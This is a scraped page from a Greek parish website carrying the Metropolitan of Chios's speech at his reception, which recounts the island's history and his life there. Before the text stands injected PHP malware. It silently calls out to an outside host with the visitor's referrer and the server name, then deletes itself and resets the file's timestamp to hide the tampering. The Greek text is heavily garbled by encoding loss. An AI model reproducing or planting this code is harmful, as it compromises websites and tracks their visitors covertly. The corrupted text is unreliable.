check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732960){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Create PDF Recommend Print

Άγιος Δημήτριος Νέου Φαλήρου - Τα νέα μας

Λόγος του Μητροπολίτου Χίου, Ψαρών & Οινουσών κ. Μάρκου κατά την υποδοχή του στο νησί

Χίος, ?ρα?ο νησί κι ?ν δέν φόρεσες δαφνόκλαρα, σο? φτάνει γιά δόξα σου τό ?κάνθινο το? μαρτυρίου στεφάνι.

? Χ?ρις τ?ς Τρισηλίου Θεότητος, το? ?νάρχου Πατρός, το? συνανάρχου Υ?ο? καί το? συναϊδίου ?γίου Πνεύματος, μέ τήν βοήθεια τ?ς Παναγίας μας, το? ?γίου ?νδόξου ?ποστόλου καί Ε?αγγελιστο? Μάρκου καί πάντων τ?ν ?γίων το? νησιο? μας, μέ φέρνει καί πάλι σήμερα «ε?ς τήν γ?ν ?ξ ?ς ?λήφθην», στή Χίο μας.

Στή Χίο, σταυροδρόμι πολιτισμ?ν μ? χιλιάδες χρόνια ?νδοξης ?στορίας.

Στή Χίο, ?μπνευση καί διδασκαλε?ον τ?ν ?μηρικ?ν ?π?ν.

Στή Χίο, τόπος δημιουργίας φημισμένων καλλιτεχνικ?ν ρευμάτων.

Στή Χίο, πρωτοπόρα στ? δημοκρατική πολιτειακή ?ργάνωση.

Στή Χίο, μεγάλη ναυτική κα? ?μπορική δύναμη μ? τ? καράβια της σ? ?λα τ? λιμάνια το? ?ρχαίου ?λληνικο? κόσμου.

Στή Χίο, ?σχυρή καί γενναία στ? ναυμαχία τ?ς Λάδης ?ναντι στ?ν ?σιατικό Δεσποτισμό.

Στή Χίο, πληγωμένη στ?ν πρώτη σφαγ? της τ? 493 π.Χ. ?π? το?ς Πέρσες.

Στή Χίο, ?σότιμο μέλος τ?ς Α΄ καί Β΄ ?θηναϊκ?ς Συμμαχίας στ?ν προάσπιση δημοκρατικ?ν ?ξι?ν.

Στή Χίο, ? πλουσιωτάτη τ?ν ?λληνικ?ν πόλεων, ?λλ? μ? σώφρονες κατο?κους κα? τ?ν καιρ? τ?ς ε?δαιμονίας τους.

Στή Χίο, ναυτοκράτειρα σύμμαχος, μετά τ?ν μάχη στ?ν ?σσό, το? Μεγάλου ?λεξάνδρου στ?ν ο?κουμενική του πορεία.

Στή Χίο, προασπιστής τ?ς ?νότητος τ?ν ?λληνικ?ν πόλεων στ?ν ?ποχή τ?ν Διαδόχων γι? ν? ?ποκρούσουν τ? «?κ δυσμ?ν νέφος».

Στή Χίο, «?λευθέρα πόλις», κατά τ?ν Πλίνιο, στ? Ρωμαϊκά χρόνια.

Στή Χίο, λαβωμένη ?πό τ? δεύτερη σφαγ? τ?ς ?στορίας της τ? 86 π.Χ. ?πό τ?ν Μιθριδάτη τ?ν Ε?πάτορα.

Στή Χίο, ε?λογημένη ?πό τ? διέλευση το? ?ποστόλου Παύλου καταντικρύ τ?ν παραλίων της.

Στή Χίο, ?γιασμένη ?π? τ? α?ματα το? Πρωτομάρτυρος ?γίου ?σιδώρου καί τ?ν ?τέρμονη χορεία τ?ν Μαρτύρων, τ?ν ?σίων κα? τ?ν Πατέρων της.

Στή Χίο, θέση κλειδ? στ? ναυσιπλοΐα κα? τ?ν ο?κονομικ? ζω? το? Α?γαίου, ?ταν πρωτεύουσα ?γινε ? Κωνσταντινούπολη.

Στή Χίο, πολυβασανισμένη ?π? τ?ς ?ραβικ?ς ?πιδρομ?ς κα? τόπος ?ντίστασης μ? τ? ?σχυρ? ?χυρ? της.

Στή Χίο, προεξάρχουσα τ?ν ?στυγειτόνων της, στο?ς Βυζαντινούς α??νες.

Στή Χίο, ?πόρθητο κάστρο κα? α?ώνιο θησαυροφυλάκιο τ?ς α?τοκρατορικ?ς Νέας Μον?ς.

Στή Χίο, μ?λον τ?ς ?ριδος στ? δίνη τ?ν συγκρούσεων Δυτικ?ν και Τούρκων.

Στή Χίο, ?ρχόντισσα στο?ς χρόνους τ?ς Γενουατοκρατίας.

Στή Χίο, ?κλόνητη στ?ν ?ρθόδοξη πίστη της κα? τ?ς πατροπαράδοτες ?ξίες της.

Στή Χίο, πονεμένη στούς χρόνους τ?ς Τουρκοκρατίας.

Στή Χίο, πρωτοπόρα στο διαφωτισμό κα? τ?ν παιδεία.

Στή Χίο, μάρτυς ?ερ? στ?ν καταστροφή το? 1822, ?ταν «τ? γιασεμι? κοκκίνισαν στ?ν χρόνο τ?ς σφαγ?ς της, πίνοντας α?μα ?ντ? νερ? στ?ν ?γιασμένη γ? της».

Στή Χίο, δοκιμασμένη ?πό τό σεισμό το? 1881 ?ταν «τ? χελιδόνια πέρασαν χωρ?ς ν? σταματήσουν, μ? ξέροντας στ? χαλασμ? πο? τ?ς φωλιές ν? χτίσουν».

Στή Χίο, μ? τ? προικισμένα τέκνα της ν? διαπρέπουν στ? πέρατα το? κόσμου κα? ν? τ?ν ?νασταίνουν μ? τ?ς ε?εργεσίες τους.

Στή Χίο τ?ς ?ρθοδόξου Πίστεως, τ?ν μεγάλων πνευματικ?ν ?ναστημάτων, τ?ν μαστιχοφό­ρων σχίνων, το? διεθνο?ς ?μπορίου, ? πρύτανις τ?ς παγκόσμιας ναυτοσύνης.

?δ? ε?δα γιά πρώτη φορά λαμπριάτικο τό φ?ς το? ?λιου ?πό τόν ?γαπητόν καί τήν Χρυσάνθη, γονε?ς Χριστιανούς ?ρθοδόξους καί ?λληνες.

?δ? βαπτίστικα Χριστιανός, κοινώνησα γιά πρώτη φορά το? Σώματος καί Α?ματος το? Χριστο? μας καί ?πέθεσα στό πετραχήλι το? παπα Βαγγέλη Λούρου τό βάρος τ?ν σφαλμάτων μου.

?δ? ?μαθα τά πρ?τα μου γράμματα ?πό τήν κ. Μαρία Σαραντ? - Ψώρα καί τόν ?είμνηστο Νικόλαο Γεωργούλα.

?δ? περπάτησα, ?παιξα, μίλησα μέ ?νθρώπους.

?δ? δέχθηκα τήν Χάριν τ?ς ?ερωσύνης ?πό τόν μακαριστό Γέροντά μου Μητροπολίτη Χίου, Ψαρ?ν καί Ο?νουσ?ν Διονύσιο, τόν ?ρχιερέα μέ τήν ?ρχοντική καρδιά.

?π' ?δ? κλήθηκα νά διακονήσω τήν ?νωτάτη διοικητική ?ρχή τ?ς ?κκλησίας τ?ς ?λλάδος, τήν ?ερά Σύνοδο, καί ?δ? ?πέστρεφα ?πί 11,5 χρόνια σχεδόν κάθε Σαββατοκύριακο, μέ δικές μου δαπάνες, μέσα, πολλές φορές ?πό ?ντίξοες καιρικές συνθ?κες γιά νά λειτουργηθο?ν γυμνά θυσιαστήρια καί ? ?ερά Μονή Παναγίας τ?ς Βοηθείας.

Καί ?δ? ?ρχομαι ?ργαλε?ο, σκε?ος στά χέρια το? Χριστο? μας γιά νά προσφέρω τόν Χριστό σ'α?τά τά χριστοφόρα ?λληνικά νησιά τήν Χίο, τά ψαρά καί τήν Α?γνο?σσα, νά ?δηγήσω ψυχές στήν Βασιλεία το? Θεο?.

Τόν ?γαπ? α?τόν τόν τόπο, τόν πον? α?τό τόν τόπο, τόν λατρεύω α?τόν τόν τόπο! ?δ? ?λθα νά ζήσω, ?δ? ?λθα νά διακονήσω καί ?δ? ?λθα νά πεθάνω!

Συμπατρι?τες καί συμπατριώτισσες μου!

?λοι μαζί γιά τόν Γολγοθ?, ?λοι μαζί γιά τήν ?νάσταση.

 

Πηγή: συν - οδοιπορία

 

Παντρεύεστε;

apokatastash steghs

Βαπτίζετε το παιδί σας;

Γίνεσται ανάδοχος;